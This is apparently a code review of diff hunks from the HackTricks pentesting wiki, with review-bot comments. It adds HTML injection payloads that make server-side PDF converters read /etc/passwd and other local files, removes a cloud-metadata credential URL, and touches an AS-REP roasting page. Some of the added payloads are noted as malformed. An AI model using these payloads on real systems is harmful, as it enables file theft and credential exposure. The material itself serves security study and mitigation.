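Review bot: in the new warning hint, "Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data`" should read "Change ... to ...", and "If SSRF is allowed" should be "If the SSRF works". The relative link `../ssrf-server-side-request-forgery/url-format-bypass.md` is not touched elsewhere in this commit, so confirm it resolves from this page's directory.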
@ -112,18 +126,16 @@ x.open("GET","file:///etc/passwd");x.send();
|
||||||
<link rel=attachment href="file:///root/secret.txt">
|
<link rel=attachment href="file:///root/secret.txt">
|
||||||
<object data="file:///etc/passwd">
|
<object data="file:///etc/passwd">
|
||||||
<portal src="file:///etc/passwd" id=portal>
|
<portal src="file:///etc/passwd" id=portal>
|
||||||
|
<embed src="file:///etc/passwd>" width="400" height="400">
|
||||||
|
<style><iframe src="file:///etc/passwd">
|
||||||
|
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
|
||||||
|
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
|
||||||
```
|
```
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
|
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
|
||||||
```
|
```
|
||||||
|
|
||||||
### Get external web page response as attachment (metadata endpoints)
|
|
||||||
|
|
||||||
```markup
|
|
||||||
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
|
||||||
```
|
|
||||||
|
|
||||||
### Bot delay
|
### Bot delay
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
|
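Review bot: several of the added markup lines are malformed as written. `<embed src="file:///etc/passwd>" ...>` has a stray `>` inside the quoted attribute; `<style><iframe src="file:///etc/passwd">` leaves `<style>` unclosed; the `<img src='x' onerror='document.write('<iframe ...>')'/>` line nests single quotes inside single quotes and carries `&text=&width=500&height=500`, which looks like query-string residue copied along with the payload; and the new metadata example uses `http://http://169.254.169.254/...` with a doubled scheme. The new "Get external web page response as attachment" section would also benefit from the corresponding mitigation sentence: run the converter with local file access disabled (wkhtmltopdf has `--disable-local-file-access`) and egress-filter the host so it cannot reach link-local metadata endpoints.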
@ -177,11 +189,10 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
{% embed url="https://lbherrera.github.io/lab/h1415-ctf-writeup.html" %}
|
* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
|
||||||
|
* [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
|
||||||
{% embed url="https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/" %}
|
* [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
|
||||||
|
* [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
|
||||||
{% embed url="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html" %}
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -190,7 +201,7 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
@ -84,7 +84,7 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
|
||||||
|
|
||||||
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**HackenProof is home to all crypto bug bounties.**
|
**HackenProof is home to all crypto bug bounties.**
|
||||||
|
|
||||||
|
|
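Review bot: unrelated to this commit's figure change, but the unchanged context line in this hunk reads "AS-RRP Roasting" where the technique is AS-REP roasting; worth fixing while the file is open.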